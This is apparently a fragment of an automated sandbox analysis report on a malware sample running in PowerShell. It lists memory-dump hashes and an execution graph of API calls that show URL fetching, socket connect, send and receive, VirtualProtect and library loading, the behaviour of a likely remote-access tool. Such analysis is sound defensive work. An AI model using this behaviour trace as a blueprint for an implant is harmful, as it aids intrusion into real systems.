                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 33ae3c4208bed563843e7438315a78a28a9f40230e72ca85bbb8cbfd52069427
                                                                                                                                                                      • Instruction ID: 54b3a8dccc1f176166d10e3115fa57af1becd9f9209afcbc4df304cbb3b140bc
                                                                                                                                                                      • Opcode Fuzzy Hash: 33ae3c4208bed563843e7438315a78a28a9f40230e72ca85bbb8cbfd52069427
                                                                                                                                                                      • Instruction Fuzzy Hash: 34214436310715A7DF256E6A8850B7FB7DAABD4711F20843AE906DB3C1CEB5CD808361
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 10b5c61ac3313b199627d93e3a7ce52bef37ff63a3624dbb98d91280a1298d5b
                                                                                                                                                                      • Instruction ID: 224f6b333fd1233c8be51d8ebcfbe7be98994f38d6eea6ad9aef58abf2ad34d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 10b5c61ac3313b199627d93e3a7ce52bef37ff63a3624dbb98d91280a1298d5b
                                                                                                                                                                      • Instruction Fuzzy Hash: B731FC3260C3C66FCF079FB058507AD7FB1BF46200F18819AE9989F287CB299955C751
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3952013e2c3fd0fd8f92961c95f9b4cf07e37cf113e373e66117acf1ad395a33
                                                                                                                                                                      • Instruction ID: 28687c1e4ae58f46cc729dc628d679f20f61e7359fc75e43afc4fad191197923
                                                                                                                                                                      • Opcode Fuzzy Hash: 3952013e2c3fd0fd8f92961c95f9b4cf07e37cf113e373e66117acf1ad395a33
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F21863670414AAFCF029F94EC00AADBF62FF89314F148155FA1556251CB329972DB50
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 202da476ccd8a894399048b7440439584f77880983bbfb04b4cb15163b8752dc
                                                                                                                                                                      • Instruction ID: f451ea778e47f50e8054b5c4a84f1b030ed62a28ebd9bcad60aabb8236d0e5d3
                                                                                                                                                                      • Opcode Fuzzy Hash: 202da476ccd8a894399048b7440439584f77880983bbfb04b4cb15163b8752dc
                                                                                                                                                                      • Instruction Fuzzy Hash: 12112936704244DFDF2A6A74D4102FEBBA1AF95361F2080ABD8928B256DB318E16C391
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486117407.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_ed000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 02b822e93d60f5370272d326c67a392e2b3877d2d45ad21685635b3553eefa6c
                                                                                                                                                                      • Instruction ID: bf3dc013a30983287ef6bc3433cae1fae2fa4f4427de5040e8d20b6620b9c487
                                                                                                                                                                      • Opcode Fuzzy Hash: 02b822e93d60f5370272d326c67a392e2b3877d2d45ad21685635b3553eefa6c
                                                                                                                                                                      • Instruction Fuzzy Hash: 4E014C7100E3C09FD7168B258C94B52BFB4DF43624F1D81DBD9889F1A3C2695848C772
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486117407.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_ed000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 37233ba41c9a60e8ae73a8cf772e3a1dd013588e25c366af17d988a25f573233
                                                                                                                                                                      • Instruction ID: efccb2eae234dd1f887e871a2dd402e467be6b452e9943d852f1c806ed6d21ae
                                                                                                                                                                      • Opcode Fuzzy Hash: 37233ba41c9a60e8ae73a8cf772e3a1dd013588e25c366af17d988a25f573233
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C01F230108380EEE7248E26CCC4B6ABBD8DF81764F1CC41BED582F282C2799941DAB1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $;2$(:2$(:2$(:2$L4#p$L4#p$L4#p$L4#p$L4#p$L4#p$L:2$L:2$L:2
                                                                                                                                                                      • API String ID: 0-1322742923
                                                                                                                                                                      • Opcode ID: 13cd67e293b7eaa7ba22332d9509ee46f09021aec8cf53f638f93955ac5fa050
                                                                                                                                                                      • Instruction ID: 97e0ab887862653c8a6df76080b017d0cd14b8c33820faafc3cb5a977fce0942
                                                                                                                                                                      • Opcode Fuzzy Hash: 13cd67e293b7eaa7ba22332d9509ee46f09021aec8cf53f638f93955ac5fa050
                                                                                                                                                                      • Instruction Fuzzy Hash: 64E14435700214EFDF2A9F64C850BBE7BA6AFC1310F158076E9459B292CB75DD81CBA1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000010.00000002.486233315.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_16_2_390000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (Fc$H;2$L4#p$L4#p$L4#p
                                                                                                                                                                      • API String ID: 0-3903389973
                                                                                                                                                                      • Opcode ID: 3027b3503bb73bba8915e83f113c5bc1faf6e0cf0481674da7faa17f835b37ac
                                                                                                                                                                      • Instruction ID: 23bc9c3e6b444816b7f02e3f9863898920a8d912d725e859225c31b35ffc0fcc
                                                                                                                                                                      • Opcode Fuzzy Hash: 3027b3503bb73bba8915e83f113c5bc1faf6e0cf0481674da7faa17f835b37ac
                                                                                                                                                                      • Instruction Fuzzy Hash: DF6158317002489FDF1A9F64C8507BEBBA2EFC0310F15806AE9559B292DB75ED81CBA1

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:5.9%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:19.8%
                                                                                                                                                                      Signature Coverage:4%
                                                                                                                                                                      Total number of Nodes:1509
                                                                                                                                                                      Total number of Limit Nodes:43
                                                                                                                                                                      execution_graph 53076 415d41 53091 41b411 53076->53091 53078 415d4a 53102 4020f6 53078->53102 53083 4170c4 53126 401e8d 53083->53126 53087 401fd8 11 API calls 53088 4170d9 53087->53088 53089 401fd8 11 API calls 53088->53089 53090 4170e5 53089->53090 53132 4020df 53091->53132 53096 41b456 InternetReadFile 53100 41b479 53096->53100 53097 41b4a6 InternetCloseHandle InternetCloseHandle 53099 41b4b8 53097->53099 53099->53078 53100->53096 53100->53097 53101 401fd8 11 API calls 53100->53101 53143 4020b7 53100->53143 53101->53100 53103 40210c 53102->53103 53104 4023ce 11 API calls 53103->53104 53105 402126 53104->53105 53106 402569 28 API calls 53105->53106 53107 402134 53106->53107 53108 404aa1 53107->53108 53109 404ab4 53108->53109 53210 40520c 53109->53210 53111 404ac9 ctype 53112 404b40 WaitForSingleObject 53111->53112 53113 404b20 53111->53113 53115 404b56 53112->53115 53114 404b32 send 53113->53114 53116 404b7b 53114->53116 53216 4210cb 54 API calls 53115->53216 53119 401fd8 11 API calls 53116->53119 53118 404b69 SetEvent 53118->53116 53120 404b83 53119->53120 53121 401fd8 11 API calls 53120->53121 53122 404b8b 53121->53122 53122->53083 53123 401fd8 53122->53123 53124 4023ce 11 API calls 53123->53124 53125 401fe1 53124->53125 53125->53083 53127 402163 53126->53127 53128 40219f 53127->53128 53234 402730 11 API calls 53127->53234 53128->53087 53130 402184 53235 402712 11 API calls std::_Deallocate 53130->53235 53133 4020e7 53132->53133 53149 4023ce 53133->53149 53135 4020f2 53136 43bda0 53135->53136 53141 4461b8 __Getctype 53136->53141 53137 4461f6 53165 44062d 20 API calls _free 53137->53165 53138 4461e1 RtlAllocateHeap 53140 41b42f InternetOpenW InternetOpenUrlW 53138->53140 53138->53141 53140->53096 53141->53137 53141->53138 53164 443001 7 API calls 2 library calls 53141->53164 53144 4020bf 53143->53144 53145 4023ce 11 API calls 53144->53145 53146 4020ca 53145->53146 53166 40250a 53146->53166 53148 4020d9 53148->53100 53150 402428 53149->53150 53151 4023d8 53149->53151 53150->53135 53151->53150 53153 4027a7 53151->53153 53154 402e21 53153->53154 53157 4016b4 53154->53157 53156 402e30 53156->53150 53158 4016cb 53157->53158 53159 4016c6 53157->53159 53158->53159 53160 4016f3 53158->53160 53163 43bd68 11 API calls _Atexit 53159->53163 53160->53156 53162 43bd67 53163->53162 53164->53141 53165->53140 53167 40251a 53166->53167 53168 402520 53167->53168 53169 402535 53167->53169 53173 402569 53168->53173 53183 4028e8 53169->53183 53172 402533 53172->53148 53194 402888 53173->53194 53175 40257d 53176 402592 53175->53176 53177 4025a7 53175->53177 53199 402a34 22 API calls 53176->53199 53179 4028e8 28 API calls 53177->53179 53182 4025a5 53179->53182 53180 40259b 53200 4029da 22 API calls 53180->53200 53182->53172 53184 4028f1 53183->53184 53185 402953 53184->53185 53186 4028fb 53184->53186 53208 4028a4 22 API calls 53185->53208 53189 402904 53186->53189 53191 402917 53186->53191 53202 402cae 53189->53202 53190 402915 53190->53172 53191->53190 53193 4023ce 11 API calls 53191->53193 53193->53190 53195 402890 53194->53195 53196 402898 53195->53196 53201 402ca3 22 API calls 53195->53201 53196->53175 53199->53180 53200->53182 53203 402cb8 __EH_prolog 53202->53203 53209 402e54 22 API calls 53203->53209 53205 4023ce 11 API calls 53207 402d92 53205->53207 53206 402d24 53206->53205 53207->53190 53209->53206 53211 405214 53210->53211 53212 4023ce 11 API calls 53211->53212 53213 40521f 53212->53213 53217 405234 53213->53217 53215 40522e 53215->53111 53216->53118 53218 405240 53217->53218 53219 40526e 53217->53219 53221 4028e8 28 API calls 53218->53221 53233 4028a4 22 API calls 53219->53233 53223 40524a 53221->53223 53223->53215 53234->53130 53235->53128 53236 10006d60 53237 10006d69 53236->53237 53238 10006d72 53236->53238 53240 10006c5f 53237->53240 53260 10005af6 GetLastError 53240->53260 53242 10006c6c 53280 10006d7e 53242->53280 53244 10006c74 53289 100069f3 53244->53289 53247 10006c8b 53247->53238 53253 10006cc9 53313 10006368 19 API calls _free 53253->53313 53255 10006d12 53256 10006cce 53255->53256 53316 100068c9 25 API calls 53255->53316 53314 1000571e 19 API calls _free 53256->53314 53257 10006ce6 53257->53255 53315 1000571e 19 API calls _free 53257->53315 53261 10005b12 53260->53261 53262 10005b0c 53260->53262 53266 10005b61 SetLastError 53261->53266 53318 1000637b 19 API calls 2 library calls 53261->53318 53317 10005e08 10 API calls 2 library calls 53262->53317 53265 10005b24 53267 10005b2c 53265->53267 53320 10005e5e 10 API calls 2 library calls 53265->53320 53266->53242 53319 1000571e 19 API calls _free 53267->53319 53269 10005b41 53269->53267 53271 10005b48 53269->53271 53321 1000593c 19 API calls _abort 53271->53321 53272 10005b32 53274 10005b6d SetLastError 53272->53274 53323 100055a8 36 API calls _abort 53274->53323 53275 10005b53 53322 1000571e 19 API calls _free 53275->53322 53279 10005b5a 53279->53266 53279->53274 53281 10006d8a ___DestructExceptionObject 53280->53281 53282 10005af6 _abort 36 API calls 53281->53282 53287 10006d94 53282->53287 53284 10006e18 _abort 53284->53244 53287->53284 53324 100055a8 36 API calls _abort 53287->53324 53325 10005671 RtlEnterCriticalSection 53287->53325 53326 1000571e 19 API calls _free 53287->53326 53327 10006e0f RtlLeaveCriticalSection _abort 53287->53327 53328 100054a7 53289->53328 53292 10006a14 GetOEMCP 53295 10006a3d 53292->53295 53293 10006a26 53294 10006a2b GetACP 53293->53294 53293->53295 53294->53295 53295->53247 53296 100056d0 53295->53296 53297 1000570e 53296->53297 53302 100056de _abort 53296->53302 53339 10006368 19 API calls _free 53297->53339 53298 100056f9 RtlAllocateHeap 53300 1000570c 53298->53300 53298->53302 53300->53256 53303 10006e20 53300->53303 53302->53297 53302->53298 53338 1000474f 7 API calls 2 library calls 53302->53338 53304 100069f3 38 API calls 53303->53304 53305 10006e3f 53304->53305 53308 10006e90 IsValidCodePage 53305->53308 53310 10006e46 53305->53310 53312 10006eb5 ___scrt_fastfail 53305->53312 53307 10006cc1 53307->53253 53307->53257 53309 10006ea2 GetCPInfo 53308->53309 53308->53310 53309->53310 53309->53312 53350 10002ada 53310->53350 53340 10006acb GetCPInfo 53312->53340 53313->53256 53314->53247 53315->53255 53316->53256 53317->53261 53318->53265 53319->53272 53320->53269 53321->53275 53322->53279 53325->53287 53326->53287 53327->53287 53329 100054c4 53328->53329 53335 100054ba 53328->53335 53330 10005af6 _abort 36 API calls 53329->53330 53329->53335 53331 100054e5 53330->53331 53336 10007a00 36 API calls __fassign 53331->53336 53333 100054fe 53337 10007a2d 36 API calls __fassign 53333->53337 53335->53292 53335->53293 53336->53333 53337->53335 53338->53302 53339->53300 53346 10006b05 53340->53346 53349 10006baf 53340->53349 53343 10002ada _ValidateLocalCookies 5 API calls 53345 10006c5b 53343->53345 53345->53310 53357 100086e4 53346->53357 53348 10008a3e 41 API calls 53348->53349 53349->53343 53351 10002ae3 53350->53351 53352 10002ae5 IsProcessorFeaturePresent 53350->53352 53351->53307 53354 10002b58 53352->53354 53427 10002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53354->53427 53356 10002c3b 53356->53307 53358 100054a7 __fassign 36 API calls 53357->53358 53359 10008704 MultiByteToWideChar 53358->53359 53361 10008742 53359->53361 53367 100087da 53359->53367 53363 100056d0 20 API calls 53361->53363 53368 10008763 ___scrt_fastfail 53361->53368 53362 10002ada _ValidateLocalCookies 5 API calls 53364 10006b66 53362->53364 53363->53368 53371 10008a3e 53364->53371 53365 100087d4 53376 10008801 19 API calls _free 53365->53376 53367->53362 53368->53365 53369 100087a8 MultiByteToWideChar 53368->53369 53369->53365 53370 100087c4 GetStringTypeW 53369->53370 53370->53365 53372 100054a7 __fassign 36 API calls 53371->53372 53373 10008a51 53372->53373 53377 10008821 53373->53377 53376->53367 53378 1000883c 53377->53378 53379 10008862 MultiByteToWideChar 53378->53379 53380 10008a16 53379->53380 53381 1000888c 53379->53381 53382 10002ada _ValidateLocalCookies 5 API calls 53380->53382 53384 100056d0 20 API calls 53381->53384 53386 100088ad 53381->53386 53383 10006b87 53382->53383 53383->53348 53384->53386 53385 100088f6 MultiByteToWideChar 53387 1000890f 53385->53387 53400 10008962 53385->53400 53386->53385 53386->53400 53404 10005f19 53387->53404 53391 10008971 53393 10008992 53391->53393 53394 100056d0 20 API calls 53391->53394 53392 10008939 53396 10005f19 10 API calls 53392->53396 53392->53400 53395 10008a07 53393->53395 53398 10005f19 10 API calls 53393->53398 53394->53393 53412 10008801 19 API calls _free 53395->53412 53396->53400 53399 100089e6 53398->53399 53399->53395 53401 100089f5 WideCharToMultiByte 53399->53401 53413 10008801 19 API calls _free 53400->53413 53401->53395 53402 10008a35 53401->53402 53414 10008801 19 API calls _free 53402->53414 53415 10005c45 53404->53415 53406 10005f40 53409 10005f49 53406->53409 53419 10005fa1 9 API calls 2 library calls 53406->53419 53408 10005f89 LCMapStringW 53408->53409 53410 10002ada _ValidateLocalCookies 5 API calls 53409->53410 53411 10005f9b 53410->53411 53411->53391 53411->53392 53411->53400 53412->53400 53413->53380 53414->53400 53416 10005c71 53415->53416 53418 10005c75 __crt_fast_encode_pointer 53415->53418 53416->53418 53420 10005ce1 53416->53420 53418->53406 53419->53408 53421 10005d02 LoadLibraryExW 53420->53421 53422 10005cf7 53420->53422 53423 10005d37 53421->53423 53424 10005d1f GetLastError 53421->53424 53422->53416 53423->53422 53426 10005d4e FreeLibrary 53423->53426 53424->53423 53425 10005d2a LoadLibraryExW 53424->53425 53425->53423 53426->53422 53427->53356 53428 434906 53433 434bd8 SetUnhandledExceptionFilter 53428->53433 53430 43490b pre_c_initialization 53434 4455cc 20 API calls 2 library calls 53430->53434 53432 434916 53433->53430 53434->53432 53435 1000c7a7 53436 1000c7be 53435->53436 53441 1000c82c 53435->53441 53436->53441 53445 1000c7e6 GetModuleHandleA 53436->53445 53437 1000c872 53438 1000c835 GetModuleHandleA 53440 1000c83f 53438->53440 53440->53440 53440->53441 53441->53437 53441->53438 53446 1000c7ef 53445->53446 53452 1000c82c 53445->53452 53455 1000c803 53446->53455 53448 1000c872 53449 1000c835 GetModuleHandleA 53450 1000c83f 53449->53450 53450->53450 53450->53452 53452->53448 53452->53449 53456 1000c809 53455->53456 53457 1000c82c 53456->53457 53458 1000c80d VirtualProtect 53456->53458 53460 1000c872 53457->53460 53461 1000c835 GetModuleHandleA 53457->53461 53458->53457 53459 1000c81c VirtualProtect 53458->53459 53459->53457 53462 1000c83f 53461->53462 53462->53457 53463 43bea8 53466 43beb4 _swprintf ___DestructExceptionObject 53463->53466 53464 43bec2 53479 44062d 20 API calls _free 53464->53479 53466->53464 53467 43beec 53466->53467 53474 445909 EnterCriticalSection 53467->53474 53469 43bef7 53475 43bf98 53469->53475 53470 43bec7 pre_c_initialization ___DestructExceptionObject 53474->53469 53476 43bfa6 53475->53476 53478 43bf02 53476->53478 53481 4497ec 37 API calls 2 library calls 53476->53481 53480 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53478->53480 53479->53470 53480->53470 53481->53476 53482 4458c8 53483 4458d3 53482->53483 53485 4458fc 53483->53485 53486 4458f8 53483->53486 53488 448b04 53483->53488 53495 445920 DeleteCriticalSection 53485->53495 53496 44854a 53488->53496 53491 448b49 InitializeCriticalSectionAndSpinCount 53492 448b34 53491->53492 53503 43502b 53492->53503 53494 448b60 53494->53483 53495->53486 53497 448576 53496->53497 53498 44857a 53496->53498 53497->53498 53500 44859a 53497->53500 53510 4485e6 53497->53510 53498->53491 53498->53492 53500->53498 53501 4485a6 GetProcAddress 53500->53501 53502 4485b6 __crt_fast_encode_pointer 53501->53502 53502->53498 53504 435036 IsProcessorFeaturePresent 53503->53504 53505 435034 53503->53505 53507 435078 53504->53507 53505->53494 53517 43503c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53507->53517 53509 43515b 53509->53494 53511 448607 LoadLibraryExW 53510->53511 53516 4485fc 53510->53516 53512 448624 GetLastError 53511->53512 53513 44863c 53511->53513 53512->53513 53514 44862f LoadLibraryExW 53512->53514 53515 448653 FreeLibrary 53513->53515 53513->53516 53514->53513 53515->53516 53516->53497 53517->53509 53518 41e04e 53519 41e063 ctype ___scrt_fastfail 53518->53519 53520 41e266 53519->53520 53537 432f55 21 API calls new 53519->53537 53526 41e21a 53520->53526 53532 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53520->53532 53523 41e277 53523->53526 53533 432f55 21 API calls new 53523->53533 53525 41e213 ___scrt_fastfail 53525->53526 53538 432f55 21 API calls new 53525->53538 53528 41e2b0 ___scrt_fastfail 53528->53526 53534 4335db 53528->53534 53530 41e240 ___scrt_fastfail 53530->53526 53539 432f55 21 API calls new 53530->53539 53532->53523 53533->53528 53540 4334fa 53534->53540 53536 4335e3 53536->53526 53537->53525 53538->53530 53539->53520 53541 433513 53540->53541 53544 433509 53540->53544 53541->53544 53546 432f55 21 API calls new 53541->53546 53543 433534 53543->53544 53547 4338c8 CryptAcquireContextA 53543->53547 53544->53536 53546->53543 53548 4338e9 CryptGenRandom 53547->53548 53549 4338e4 53547->53549 53548->53549 53550 4338fe CryptReleaseContext 53548->53550 53549->53544 53550->53549 53551 426c6d 53557 426d42 recv 53551->53557 53558 426a77 53559 426a8c 53558->53559 53571 426b1e 53558->53571 53560 426b83 53559->53560 53561 426bae 53559->53561 53564 426b0e 53559->53564 53568 426b4e 53559->53568 53570 426ad9 53559->53570 53559->53571 53572 426bd5 53559->53572 53586 424f6e 49 API calls ctype 53559->53586 53560->53561 53590 425781 21 API calls 53560->53590 53561->53571 53561->53572 53574 425b72 53561->53574 53564->53568 53564->53571 53588 424f6e 49 API calls ctype 53564->53588 53568->53560 53568->53571 53589 41fbfd 52 API calls 53568->53589 53570->53564 53570->53571 53587 41fbfd 52 API calls 53570->53587 53572->53571 53591 4261e6 28 API calls 53572->53591 53575 425b91 ___scrt_fastfail 53574->53575 53577 425ba0 53575->53577 53581 425bc5 53575->53581 53592 41ec4c 21 API calls 53575->53592 53577->53581 53585 425ba5 53577->53585 53593 420669 46 API calls 53577->53593 53580 425bae 53580->53581 53596 424d96 21 API calls 2 library calls 53580->53596 53581->53572 53583 425c48 53583->53581 53594 432f55 21 API calls new 53583->53594 53585->53580 53585->53581 53595 41daf0 49 API calls 53585->53595 53586->53570 53587->53570 53588->53568 53589->53568 53590->53561 53591->53571 53592->53577 53593->53583 53594->53585 53595->53580 53596->53581 53597 4165db 53608 401e65 53597->53608 53599 4165eb 53600 4020f6 28 API calls 53599->53600 53601 4165f6 53600->53601 53602 401e65 22 API calls 53601->53602 53603 416601 53602->53603 53604 4020f6 28 API calls 53603->53604 53605 41660c 53604->53605 53613 412965 53605->53613 53609 401e6d 53608->53609 53610 401e75 53609->53610 53632 402158 22 API calls 53609->53632 53610->53599 53633 40482d 53613->53633 53615 412979 53640 4048c8 connect 53615->53640 53619 41299a 53705 402f10 53619->53705 53622 404aa1 61 API calls 53623 4129ae 53622->53623 53624 401fd8 11 API calls 53623->53624 53625 4129b6 53624->53625 53710 404c10 53625->53710 53628 401fd8 11 API calls 53629 4129cc 53628->53629 53630 401fd8 11 API calls 53629->53630 53631 4129d4 53630->53631 53634 404846 socket 53633->53634 53635 404839 53633->53635 53636 404860 CreateEventW 53634->53636 53637 404842 53634->53637 53728 40489e WSAStartup 53635->53728 53636->53615 53637->53615 53639 40483e 53639->53634 53639->53637 53641 404a1b 53640->53641 53642 4048ee 53640->53642 53643 40497e 53641->53643 53644 404a21 WSAGetLastError 53641->53644 53642->53643 53645 404923 53642->53645 53729 40531e 53642->53729 53700 402f31 53643->53700 53644->53643 53646 404a31 53644->53646 53764 420cf1 27 API calls 53645->53764 53648 404932 53646->53648 53649 404a36 53646->53649 53654 402093 28 API calls 53648->53654 53769 41cb72 30 API calls 53649->53769 53651 40490f 53734 402093 53651->53734 53653 40492b 53653->53648 53657 404941 53653->53657 53658 404a80 53654->53658 53656 404a40 53770 4052fd 28 API calls 53656->53770 53664 404950 53657->53664 53665 404987 53657->53665 53661 402093 28 API calls 53658->53661 53666 404a8f 53661->53666 53668 402093 28 API calls 53664->53668 53766 421ad1 54 API calls 53665->53766 53669 41b580 80 API calls 53666->53669 53672 40495f 53668->53672 53669->53643 53675 402093 28 API calls 53672->53675 53673 40498f 53676 4049c4 53673->53676 53677 404994 53673->53677 53679 40496e 53675->53679 53768 420e97 28 API calls 53676->53768 53681 402093 28 API calls 53677->53681 53684 41b580 80 API calls 53679->53684 53683 4049a3 53681->53683 53686 402093 28 API calls 53683->53686 53687 404973 53684->53687 53685 4049cc 53688 4049f9 CreateEventW CreateEventW 53685->53688 53690 402093 28 API calls 53685->53690 53689 4049b2 53686->53689 53765 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53687->53765 53688->53643 53691 41b580 80 API calls 53689->53691 53693 4049e2 53690->53693 53694 4049b7 53691->53694 53695 402093 28 API calls 53693->53695 53767 421143 52 API calls 53694->53767 53697 4049f1 53695->53697 53698 41b580 80 API calls 53697->53698 53699 4049f6 53698->53699 53699->53688 53701 4020df 11 API calls 53700->53701 53702 402f3d 53701->53702 53703 4032a0 28 API calls 53702->53703 53704 402f59 53703->53704 53704->53619 53821 401fb0 53705->53821 53707 402f1e 53708 402055 11 API calls 53707->53708 53709 402f2d 53708->53709 53709->53622 53711 4020df 11 API calls 53710->53711 53712 404c27 53711->53712 53713 4020df 11 API calls 53712->53713 53716 404c30 53713->53716 53714 43bda0 new 21 API calls 53714->53716 53716->53714 53717 4020b7 28 API calls 53716->53717 53718 404ca1 53716->53718 53722 401fd8 11 API calls 53716->53722 53824 404b96 53716->53824 53830 401fe2 53716->53830 53839 404cc3 53716->53839 53717->53716 53851 404e26 WaitForSingleObject 53718->53851 53722->53716 53723 401fd8 11 API calls 53724 404cb1 53723->53724 53725 401fd8 11 API calls 53724->53725 53726 404cba 53725->53726 53726->53628 53728->53639 53730 4020df 11 API calls 53729->53730 53731 40532a 53730->53731 53771 4032a0 53731->53771 53733 405346 53733->53651 53735 40209b 53734->53735 53736 4023ce 11 API calls 53735->53736 53737 4020a6 53736->53737 53775 4024ed 53737->53775 53740 41b580 53741 41b631 53740->53741 53742 41b596 GetLocalTime 53740->53742 53744 401fd8 11 API calls 53741->53744 53743 40531e 28 API calls 53742->53743 53745 41b5d8 53743->53745 53746 41b639 53744->53746 53779 406383 53745->53779 53748 401fd8 11 API calls 53746->53748 53750 41b641 53748->53750 53750->53645 53751 402f10 28 API calls 53752 41b5f0 53751->53752 53753 406383 28 API calls 53752->53753 53754 41b5fc 53753->53754 53784 40723b 77 API calls 53754->53784 53756 41b60a 53757 401fd8 11 API calls 53756->53757 53758 41b616 53757->53758 53759 401fd8 11 API calls 53758->53759 53760 41b61f 53759->53760 53761 401fd8 11 API calls 53760->53761 53762 41b628 53761->53762 53763 401fd8 11 API calls 53762->53763 53763->53741 53764->53653 53765->53643 53766->53673 53767->53687 53768->53685 53769->53656 53772 4032aa 53771->53772 53773 4028e8 28 API calls 53772->53773 53774 4032c9 53772->53774 53773->53774 53774->53733 53776 4024f9 53775->53776 53777 40250a 28 API calls 53776->53777 53778 4020b1 53777->53778 53778->53740 53785 4051ef 53779->53785 53781 406391 53789 402055 53781->53789 53784->53756 53786 4051fb 53785->53786 53795 405274 53786->53795 53788 405208 53788->53781 53790 402061 53789->53790 53791 4023ce 11 API calls 53790->53791 53792 40207b 53791->53792 53817 40267a 53792->53817 53796 405282 53795->53796 53797 40529e 53796->53797 53798 405288 53796->53798 53800 4052f5 53797->53800 53801 4052b6 53797->53801 53806 4025f0 53798->53806 53815 4028a4 22 API calls 53800->53815 53804 4028e8 28 API calls 53801->53804 53805 40529c 53801->53805 53804->53805 53805->53788 53807 402888 22 API calls 53806->53807 53808 402602 53807->53808 53809 402672 53808->53809 53810 402629 53808->53810 53816 4028a4 22 API calls 53809->53816 53812 4028e8 28 API calls 53810->53812 53814 40263b 53810->53814 53812->53814 53814->53805 53818 40268b 53817->53818 53819 4023ce 11 API calls 53818->53819 53820 40208d 53819->53820 53820->53751 53822 4025f0 28 API calls 53821->53822 53823 401fbd 53822->53823 53823->53707 53825 404ba0 WaitForSingleObject 53824->53825 53826 404bcd recv 53824->53826 53864 421107 54 API calls 53825->53864 53828 404be0 53826->53828 53828->53716 53829 404bbc SetEvent 53829->53828 53831 401ff1 53830->53831 53832 402039 53830->53832 53833 4023ce 11 API calls 53831->53833 53832->53716 53834 401ffa 53833->53834 53835 40203c 53834->53835 53837 402015 53834->53837 53836 40267a 11 API calls 53835->53836 53836->53832 53865 403098 28 API calls 53837->53865 53840 4020df 11 API calls 53839->53840 53850 404cde 53840->53850 53841 404e13 53842 401fd8 11 API calls 53841->53842 53843 404e1c 53842->53843 53843->53716 53844 4041a2 28 API calls 53844->53850 53845 401fe2 28 API calls 53845->53850 53846 401fd8 11 API calls 53846->53850 53847 4020f6 28 API calls 53847->53850 53850->53841 53850->53844 53850->53845 53850->53846 53850->53847 53866 401fc0 53850->53866 53852 404e40 SetEvent CloseHandle 53851->53852 53853 404e57 closesocket 53851->53853 53854 404ca8 53852->53854 53855 404e64 53853->53855 53854->53723 53856 404e7a 53855->53856 54158 4050e4 84 API calls 53855->54158 53858 404e8c WaitForSingleObject 53856->53858 53859 404ece SetEvent CloseHandle 53856->53859 54159 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53858->54159 53859->53854 53861 404e9b SetEvent WaitForSingleObject 54160 41e7a2 